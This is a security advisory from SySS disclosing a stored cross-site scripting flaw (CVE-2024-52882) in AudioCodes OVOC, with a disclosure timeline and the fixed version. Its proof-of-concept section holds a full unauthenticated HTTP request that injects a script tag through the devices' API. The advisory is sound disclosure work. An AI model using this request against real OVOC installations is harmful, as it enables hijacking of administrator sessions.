-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-076
Product:                   One Voice Operations Center (OVOC)
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       < 8.4.582
Tested Version(s):         8.2.3122
Vulnerability Type:        Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2024-08-30
Solution Date:             2024-10-20
Public Disclosure:         2025-02-07
CVE Reference:             CVE-2024-52882
Author of Advisory:        Moritz Abrell, SySS GmbH
                           Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

AudioCodes OVOC is used for central management and logging/monitoring of 
AudioCodes devices.

The manufacturer describes the product as follows (see [1]):

"AudioCodes One Voice Operations Center (OVOC) is a voice network 
management solution that combines management of voice network 
devices and quality of experience monitoring into a single, 
intuitive application. OVOC enables administrators to adopt a holistic 
approach to network lifecycle management by simplifying everyday tasks 
and assisting in troubleshooting all the way from detection to correction. 
OVOC can be deployed in service provider and enterprise networks and 
supports end-to-end quality of experience monitoring in Microsoft Teams 
environments.

OVOC provides IT staff with single pane of glass through which they can 
manage and monitor VoIP devices and elements from a single centralized 
location, saving time and costs. Tasks normally considered to be complex 
and time-consuming, such as performing root cause analysis, provisioning 
new devices and initiating bulk software updates, can now be carried out 
simply and rapidly. OVOC’s open APIs enable integration with 3rd party 
applications to provide additional functionality such as enhanced voice 
analytics and data-layer monitoring."

Due to improper neutralization of input via the devices' API, an attacker 
can inject malicious JavaScript code (XSS) to attack logged-in
administrator sessions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The devices' API is used by VoIP devices to update configuration and meta 
information as well as request actions from OVOC.

An unauthenticated attacker is able to send an "Init" request to add an 
unassigned device inside the devices' manager. Since the input is not 
sanitized, this allows injecting malicious JavaScript code. This code is 
then included for the devices' list, which is then executed by visiting,
e.g., the landing page of the devices' manager. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Injecting JavaScript code via the devices' API:

POST /rest/v1/ipphoneMgrStatus/init HTTP/1.1
Host: 192.0.2.1
Accept: */*
Content-Type: application/json; charset=UTF-8
User-Agent: AUDC/3.4.8.808 AUDC-IPPhone-C450HD_UC_3.4.8.808
Content-Length: 763
Connection: close

{
    "sessionId": "",
    "emsUserName": "",
    "emsUserPassword": "",
    "ip": "",
    "subnet": "",
    "mac": "SySS",
    "vlanId": "0",
    "model": "450HD",
    "fwVersion": "",
    "BootLoaderversion": "",
    "MSTeamsversion": "",
    "ApplicationServer": "",
    "userAgent": "",
    "location": "",
    "userName": "<script>alert("Persistent XSS")</script>",
    "userId": "",
    "phoneNumber": "",
    "status": "",
    "sipProxy": "",
    "sync_id": "",
    "unreceived_request": "",
    "BToEpairingstatus": "",
    "BToEversion": "",
    "USBHeadsetType": "",
    "ModelInformation": "",
    "additionalParams": {}
}

2. Visit the device manager landing page at ...


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer recommends updating to OVOC version 8.4.582.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-08-27: Vulnerability discovered
2024-08-30: Vulnerability reported to manufacturer
2024-09-02: Asked manufacturer for reception
2024-09-02: Manufacturer confirms reception
2024-09-18: Requested a status update from the manufacturer
2024-09-19: Manufacturer responded with the investigation state
2024-10-02: Manufacturer mentioned that a fix is planned for the next 
            software release
2024-10-29: Manufacturer informed that a fix is released on October 20, 2024;
            fixed version: 8.4.582
2024-10-29: Recognized that the vulnerability is not mentioned in the
            release notes[4]; asked the manufacturer about the state
2024-10-29: Manufacturer mentioned that the vulnerability is marked as
            "internal" and not referenced publicly
2024-11-18: Informed manufacturer about the assigend CVE-ID: CVE-2024-52882
2025-01-31: Asked the manufacturer again for references in the release notes
2025-02-07: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes OVOC product website
    https://www.audiocodes.com/solutions-products/products/management-products-solutions/one-voice-operations-center
[2] SySS Security Advisory SYSS-2024-076
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-076.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] OVOC release notes
    https://www.audiocodes.com/media/bnabwtog/audiocodes-one-voice-operations-center-release-notes-ver-84.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Nicola Staller of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmekd70ACgkQrgyb+PE0
i1P45Q//UojkejSBRSGOiq7NXo0wCcqiTVBYXlfEiPXYns/Ll0L32MBb9FygOhf1
D78qKKxn60F0cNesFOI7AS8wf2FYcBDFkMrqze9xQaCPYG4fTqkZZApVuETc4aA+
gydFgNSLY7sbj51+mGElgnS6PnxNMgO0JxtaFFz8Xz9LWd4JyNUkjguTza/tx7HY
O8iUAnLSyJF1y7H5oQxvDkv+AyHQbnrU+WwYeFW6DKquF+wxCppdLFuBt24lNWuG
ro3REzk2uNMDNNqHRR3MpLqUoW+a5omEIOlpgXbiWfaueSQKxf9VA7II/AhrICjV
N3rsDxeiehGVy8Vw4QkdZXZhdboSghDdImNnFzRP6hTlP1L7X8tWAIiIZG1oAMxs
RUOFitDTgVocMTQh54phnKREXq5X3vBR/h0tg9ycnK1HaIsebuvwrnJqEB/uDo0h
5XXtDj/w6qhpdDkmsvGiuCqqiVlerpUA/66O1l/4XY/4zKmreBSIqeU9OFT9jkKA
XM6+T13dPVaygCLYeryCcmCVrMu2IQS+Dtkt9vz39ucyeoCjUqw5RbTAprSTY326
xh+GIiV4caNc0U6k9KhQGreC2Ux9mCkMOPnMXAcdnDv63favLEA1Fi9XYMnzsuDV
HiAQrBIBhWrggu0niq+/KV6uCrhNU9DUHocwr7txKE+B91Z0Rr0=
=jVMe
-----END PGP SIGNATURE-----